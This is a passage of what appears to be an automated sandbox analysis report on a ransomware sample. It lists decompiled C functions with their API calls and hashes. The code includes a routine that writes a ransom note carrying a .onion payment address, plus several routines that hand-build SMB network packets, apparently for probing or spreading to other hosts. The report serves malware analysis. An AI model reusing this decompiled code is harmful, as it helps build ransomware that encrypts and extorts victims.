                                                                                                                                                                                        					if(0xfde8 > 0 &&  *((intOrPtr*)(_v12 + 9)) == 0) {
                                                                                                                                                                                        						_t37 = HeapAlloc(GetProcessHeap(), 8, 0xfde8);
                                                                                                                                                                                        						 *_a16 = _t37;
                                                                                                                                                                                        						_t48 =  *_t60;
                                                                                                                                                                                        						if(_t48 != 0) {
                                                                                                                                                                                        							memcpy(_t37, _v12, _t48);
                                                                                                                                                                                        							_v5 = 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				HeapFree(GetProcessHeap(), 8, _t40);
                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                        			}













                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000FFFF,74654F20,00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 007B3089
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3092
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000003F,74655520,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B30A4
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B30A7
                                                                                                                                                                                        • htons.WS2_32(0000003B), ref: 007B30BF
                                                                                                                                                                                        • send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 007B30F7
                                                                                                                                                                                        • recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 007B310D
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3127
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B312E
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B3144
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3153
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B315A
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3165
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B316C
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$Alloc$Free$htonsmemcpyrecvsend
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 317911368-3175316637
                                                                                                                                                                                        • Opcode ID: 155c1cc86d155ce7e2edc395b1ab9c2a40942e2eaf6273b9ea0a847328437d35
                                                                                                                                                                                        • Instruction ID: d7bb88f1772e80d301d587fe6ddb38c9dd26ca4630438acb33d7b602f12f60fc
                                                                                                                                                                                        • Opcode Fuzzy Hash: 155c1cc86d155ce7e2edc395b1ab9c2a40942e2eaf6273b9ea0a847328437d35
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D319275500349BBDB205FA8DC49FAA7BADFF88304F158069FA04DB291EA758D40C729
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B60F9(struct _OVERLAPPED* _a4) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				short _v528;
                                                                                                                                                                                        				short _v2088;
                                                                                                                                                                                        				void _v10280;
                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                        				intOrPtr* _t54;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                                                        				intOrPtr* _t71;
                                                                                                                                                                                        
                                                                                                                                                                                        				E007BA760(0x2824);
                                                                                                                                                                                        				wsprintfW( &_v528, L"%s", L"Readme.txt");
                                                                                                                                                                                        				_t71 = _a4;
                                                                                                                                                                                        				if(PathCombineW( &_v2088, _t71 + 4,  &_v528) != 0) {
                                                                                                                                                                                        					_t35 = E007B6477();
                                                                                                                                                                                        					if(_t35 != 0) {
                                                                                                                                                                                        						if(_t35 > 1) {
                                                                                                                                                                                        							_t35 = _t35 - 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if(WaitForMultipleObjects((0 |  *((intOrPtr*)(_t71 + 0x4c)) != 0x00000000) + 1, _t71 + 0x48, 0, _t35 * 0xea60) != 0) {
                                                                                                                                                                                        							_t63 = CreateFileW( &_v2088, 0x40000000, 0, 0, 1, 0, 0);
                                                                                                                                                                                        							if(_t63 != 0xffffffff) {
                                                                                                                                                                                        								_a4 = 0;
                                                                                                                                                                                        								if(E007B57E5( *((intOrPtr*)(_t71 + 0x38)),  *_t71, _t71 + 0xc,  &_a4) != 0) {
                                                                                                                                                                                        									memset( &_v10280, 0, 0x1000);
                                                                                                                                                                                        									StrCatW( &_v10280, L"Oops! Your files have been encrypted.\r\n\r\nIf you see this text, your files are no longer accessible.\r\nYou might have been looking for a way to recover your files.\r\nDon\'t waste your time. No one will be able to recover them without our\r\ndecryption service.\r\n\r\nWe  guarantee that you can recover all your files safely. All you\r\nneed to do is submit the payment and get the decryption password.\r\n\r\nVisit our web service at caforssztxqzf2nm.onion\r\n\r\nYour personal installation key#2:\r\n\r\n");
                                                                                                                                                                                        									StrCatW( &_v10280, _a4);
                                                                                                                                                                                        									_t54 =  &_v10280;
                                                                                                                                                                                        									_v8 = 0;
                                                                                                                                                                                        									_t65 = _t54 + 2;
                                                                                                                                                                                        									do {
                                                                                                                                                                                        										_t67 =  *_t54;
                                                                                                                                                                                        										_t54 = _t54 + 2;
                                                                                                                                                                                        									} while (_t67 != 0);
                                                                                                                                                                                        									if(WriteFile(_t63,  &_v10280, (_t54 - _t65 >> 1) + (_t54 - _t65 >> 1),  &_v8, 0) != 0) {
                                                                                                                                                                                        										FlushFileBuffers(_t63);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									LocalFree(_a4);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								CloseHandle(_t63);
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return 1;
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B6118
                                                                                                                                                                                        • PathCombineW.SHLWAPI(?,?,?), ref: 007B6136
                                                                                                                                                                                          • Part of subcall function 007B6477: GetTickCount.KERNEL32 ref: 007B6477
                                                                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 007B6170
                                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 007B6191
                                                                                                                                                                                        • memset.MSVCRT ref: 007B61C8
                                                                                                                                                                                        • StrCatW.SHLWAPI(?,Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f), ref: 007B61E2
                                                                                                                                                                                        • StrCatW.SHLWAPI(?,?), ref: 007B61EE
                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 007B621B
                                                                                                                                                                                        • FlushFileBuffers.KERNEL32(00000000), ref: 007B6226
                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 007B622F
                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007B6236
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • pGdv0Hcv, xrefs: 007B61CD
                                                                                                                                                                                        • Readme.txt, xrefs: 007B6107
                                                                                                                                                                                        • Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f, xrefs: 007B61D6
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$BuffersCloseCombineCountCreateFlushFreeHandleLocalMultipleObjectsPathTickWaitWritememsetwsprintf
                                                                                                                                                                                        • String ID: Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f$Readme.txt$pGdv0Hcv
                                                                                                                                                                                        • API String ID: 1343258794-42126597
                                                                                                                                                                                        • Opcode ID: 9d2f2e58ef5b15177b1790d098a4dc352072ec4752819cf950c15faadf309e4b
                                                                                                                                                                                        • Instruction ID: ad3d7efe17dae23cc0b698dbe863c6aad386bf08122ff7ff6f9846e4b1d0b7b6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d2f2e58ef5b15177b1790d098a4dc352072ec4752819cf950c15faadf309e4b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 873161B6900248AFDB219B64DD49FDB7BFCFB49700B048565FA06D2150EB3DEA44CBA0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                                                        			E007B2F5A(intOrPtr _a4, void* _a8, short _a12, intOrPtr _a16, intOrPtr _a20, short _a24, void* _a28, signed int _a32) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                        				short _t45;
                                                                                                                                                                                        				signed short _t50;
                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                        				short _t61;
                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t36 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                                                        				_v16 = _t36;
                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                        					_t38 = _a32 & 0x0000ffff;
                                                                                                                                                                                        					_v12 = _t38;
                                                                                                                                                                                        					_t57 = HeapAlloc(GetProcessHeap(), 8, _t38 + 0x40);
                                                                                                                                                                                        					if(_t57 != 0) {
                                                                                                                                                                                        						_t59 = 9;
                                                                                                                                                                                        						memcpy(_t57, _a8, _t59 << 2);
                                                                                                                                                                                        						_t70 = _v12 + 0x40;
                                                                                                                                                                                        						_t45 = _t70 - 4;
                                                                                                                                                                                        						__imp__#9(_t45);
                                                                                                                                                                                        						 *((short*)(_t57 + 2)) = _t45;
                                                                                                                                                                                        						 *((short*)(_t57 + 0x29)) = _a12;
                                                                                                                                                                                        						 *((intOrPtr*)(_t57 + 0x2b)) = _a16;
                                                                                                                                                                                        						 *((intOrPtr*)(_t57 + 0x2f)) = _a20;
                                                                                                                                                                                        						 *((short*)(_t57 + 0x33)) = _a24;
                                                                                                                                                                                        						_t50 = _a32;
                                                                                                                                                                                        						_t61 = 0x3c;
                                                                                                                                                                                        						 *(_t57 + 0x35) = _t50;
                                                                                                                                                                                        						 *(_t57 + 0x39) = _t50;
                                                                                                                                                                                        						 *((short*)(_t57 + 0x3d)) = _t50 + 1;
                                                                                                                                                                                        						_t24 = _t57 + 0x40; // 0x40
                                                                                                                                                                                        						 *((char*)(_t57 + 8)) = 0x2f;
                                                                                                                                                                                        						 *((short*)(_t57 + 0x24)) = 0xff0c;
                                                                                                                                                                                        						 *((short*)(_t57 + 0x3b)) = _t61;
                                                                                                                                                                                        						_t53 = memcpy(_t24, _a28, _v12);
                                                                                                                                                                                        						__imp__#19(_a4, _t57, _t70, 0);
                                                                                                                                                                                        						if(_t53 > 0) {
                                                                                                                                                                                        							_t71 = _v16;
                                                                                                                                                                                        							__imp__#16(_a4, _t71, 0xffff, 0);
                                                                                                                                                                                        							if(_t53 > 0 &&  *((intOrPtr*)(_t71 + 9)) == 0) {
                                                                                                                                                                                        								_v5 = 1;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 8, _t57);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                        			}

















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 007B2F73
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B2F7C
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,7777C2E0), ref: 007B2F97
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B2F9A
                                                                                                                                                                                        • htons.WS2_32(424D53FE), ref: 007B2FBA
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B300B
                                                                                                                                                                                        • send.WS2_32(?,00000000,?,00000000), ref: 007B301B
                                                                                                                                                                                        • recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B3032
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B3048
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B304F
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 007B305A
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B3061
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 2433318192-3175316637
                                                                                                                                                                                        • Opcode ID: 890ef2d5331946cf658f990e17d3d068942e9f67b9cfe83f45f19e0ae77c8644
                                                                                                                                                                                        • Instruction ID: a4ed22a9a794b7fc7eb5717ce27a62e1f49348ee3ff002ec098a50b8b8e177f5
                                                                                                                                                                                        • Opcode Fuzzy Hash: 890ef2d5331946cf658f990e17d3d068942e9f67b9cfe83f45f19e0ae77c8644
                                                                                                                                                                                        • Instruction Fuzzy Hash: 31318D75900245AADF10AFA5DC89F9A7BB9FF48300F058065F908EB251E679D944CB29
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                        			E007B32AF(intOrPtr _a4, void* _a8, short _a12, void* _a16, void* _a20, signed short _a24) {
                                                                                                                                                                                        				signed short _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				long _t30;
                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                        				int _t40;
                                                                                                                                                                                        				signed int _t43;
                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                        				void* _t64;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v16 = 0xbadf00d;
                                                                                                                                                                                        				_t27 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                                                        				_v12 = _t27;
                                                                                                                                                                                        				if(_t27 != 0) {
                                                                                                                                                                                        					_t30 = (_a24 & 0x0000ffff) + 0x4d;
                                                                                                                                                                                        					_v8 = _t30;
                                                                                                                                                                                        					_t48 = HeapAlloc(GetProcessHeap(), 8, _t30);
                                                                                                                                                                                        					if(_t48 != 0) {
                                                                                                                                                                                        						_t50 = 9;
                                                                                                                                                                                        						_t37 = memcpy(_t48, _a8, _t50 << 2);
                                                                                                                                                                                        						__imp__#9(_v8 + 0xfffffffc);
                                                                                                                                                                                        						 *(_t48 + 2) = _t37;
                                                                                                                                                                                        						 *((short*)(_t48 + 0x22)) = _a12;
                                                                                                                                                                                        						 *((char*)(_t48 + 8)) = 0xa0;
                                                                                                                                                                                        						_t14 = _t48 + 0x24; // 0x24
                                                                                                                                                                                        						_t40 = memcpy(_t14, _a16, 0 << 2);
                                                                                                                                                                                        						_t17 = _t48 + 0x4d; // 0x4d
                                                                                                                                                                                        						asm("movsb");
                                                                                                                                                                                        						memcpy(_t17, _a20, _t40);
                                                                                                                                                                                        						_t43 = _v8 & 0x0000ffff;
                                                                                                                                                                                        						__imp__#19(_a4, _t48, _t43, 0, 0xa);
                                                                                                                                                                                        						if(_t43 > 0) {
                                                                                                                                                                                        							_t64 = _v12;
                                                                                                                                                                                        							__imp__#16(_a4, _t64, 0xffff, 0);
                                                                                                                                                                                        							if(_t43 > 0) {
                                                                                                                                                                                        								_v16 =  *((intOrPtr*)(_t64 + 9));
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 8, _t48);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v16;
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,?), ref: 007B32CB
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B32D4
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,74654F20), ref: 007B32EF
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B32F2
                                                                                                                                                                                        • htons.WS2_32(?), ref: 007B330F
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B333D
                                                                                                                                                                                        • send.WS2_32(?,00000000,?,00000000), ref: 007B3350
                                                                                                                                                                                        • recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B3368
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B337B
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B3382
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 007B338D
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B3394
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 2433318192-3175316637
                                                                                                                                                                                        • Opcode ID: 465410287aafcbf70b987896cd4d2e42c441c5ad7692400b7621cb06480d8e0a
                                                                                                                                                                                        • Instruction ID: d2510958b4b44006de669d53af547e9b98c71ee85221e64b28af33cdb3460140
                                                                                                                                                                                        • Opcode Fuzzy Hash: 465410287aafcbf70b987896cd4d2e42c441c5ad7692400b7621cb06480d8e0a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 15316B7190020AEBDB109FA59C4AFAF7BA8FF49310F048165F900EB291EB78DD05CB64
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                        			E007B2E12(intOrPtr _a4, signed int _a8, short _a12) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                        				short _t52;
                                                                                                                                                                                        				short _t53;
                                                                                                                                                                                        				short _t54;
                                                                                                                                                                                        				short _t55;
                                                                                                                                                                                        				short _t60;
                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                        				signed int _t78;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_v12 = 0xbadf00d;
                                                                                                                                                                                        				_t43 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                                                        				_v16 = _t43;
                                                                                                                                                                                        				if(_t43 == 0) {
                                                                                                                                                                                        					L14:
                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t65 = HeapAlloc(GetProcessHeap(), 8, 0x48);
                                                                                                                                                                                        				if(_t65 == 0) {
                                                                                                                                                                                        					L13:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t67 = 9;
                                                                                                                                                                                        				_t49 = memcpy(_t65, _a8, _t67 << 2);
                                                                                                                                                                                        				__imp__#9(0x44);
                                                                                                                                                                                        				 *(_t65 + 0x31) =  *(_t65 + 0x31) | 0xffffffff;
                                                                                                                                                                                        				 *(_t65 + 2) = _t49;
                                                                                                                                                                                        				_t78 = _a8;
                                                                                                                                                                                        				 *((short*)(_t65 + 0x25)) = 0xfc;
                                                                                                                                                                                        				 *((short*)(_t65 + 0x27)) = 0xec0;
                                                                                                                                                                                        				_t52 = 0x40;
                                                                                                                                                                                        				 *((short*)(_t65 + 0x29)) = _t52;
                                                                                                                                                                                        				_t53 = 4;
                                                                                                                                                                                        				 *((short*)(_t65 + 0x37)) = _t53;
                                                                                                                                                                                        				_t54 = 0x40;
                                                                                                                                                                                        				 *((short*)(_t65 + 0x39)) = _t54;
                                                                                                                                                                                        				_t55 = 5;
                                                                                                                                                                                        				 *((short*)(_t65 + 0x41)) = _t55;
                                                                                                                                                                                        				 *((char*)(_t65 + 8)) = 0x25;
                                                                                                                                                                                        				 *((char*)(_t65 + 0x24)) = 0xe;
                                                                                                                                                                                        				 *((short*)(_t65 + 0x44)) = _a12;
                                                                                                                                                                                        				_a8 = _a8 & 0x00000000;
                                                                                                                                                                                        				 *(_t78 + 0x22) = ( *(_t78 + 0x22) & 0x0000ff00) - 0x100;
                                                                                                                                                                                        				L3:
                                                                                                                                                                                        				L3:
                                                                                                                                                                                        				if(_a8 != 8) {
                                                                                                                                                                                        					 *(_t78 + 0x22) =  *(_t78 + 0x22) + 1;
                                                                                                                                                                                        					_t60 =  *(_t78 + 0x22);
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t60 = _a12;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *((short*)(_t65 + 0x22)) = _t60;
                                                                                                                                                                                        				__imp__#19(_a4, _t65, 0x48, 0);
                                                                                                                                                                                        				if(_t60 > 0) {
                                                                                                                                                                                        					_t75 = _v16;
                                                                                                                                                                                        					__imp__#16(_a4, _t75, 0xffff, 0);
                                                                                                                                                                                        					if(_t60 > 0) {
                                                                                                                                                                                        						_v12 =  *((intOrPtr*)(_t75 + 9));
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_v12 != 0) {
                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_a8 = _a8 + 1;
                                                                                                                                                                                        				if(_a8 < 0xc) {
                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_v5 = 1;
                                                                                                                                                                                        				L12:
                                                                                                                                                                                        				HeapFree(GetProcessHeap(), 8, _t65);
                                                                                                                                                                                        				goto L13;
                                                                                                                                                                                        			}

















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 007B2E32
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B2E3B
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000048,74654F20), ref: 007B2E4D
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B2E50
                                                                                                                                                                                        • htons.WS2_32(00000044), ref: 007B2E68
                                                                                                                                                                                        • send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 007B2EF3
                                                                                                                                                                                        • recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 007B2F0B
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B2F31
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B2F38
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 007B2F43
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B2F4A
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 1780562090-3175316637
                                                                                                                                                                                        • Opcode ID: 71b39c4cc206695e8332b02a4770fd43081dc6c949f2e19f94234d2baafa6054
                                                                                                                                                                                        • Instruction ID: 3b5cafdab0210db20c3a2bc0593adff6c0d66d7c2da9aedbb2cb3b4ac1307166
                                                                                                                                                                                        • Opcode Fuzzy Hash: 71b39c4cc206695e8332b02a4770fd43081dc6c949f2e19f94234d2baafa6054
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A41A075640349EADB209FA4DC89BAA7BB4FF48710F108559FA09DF292E778C845CB18
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B892A() {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				char* _t31;
                                                                                                                                                                                        				DWORD* _t32;
                                                                                                                                                                                        				long _t33;
                                                                                                                                                                                        				void* _t37;
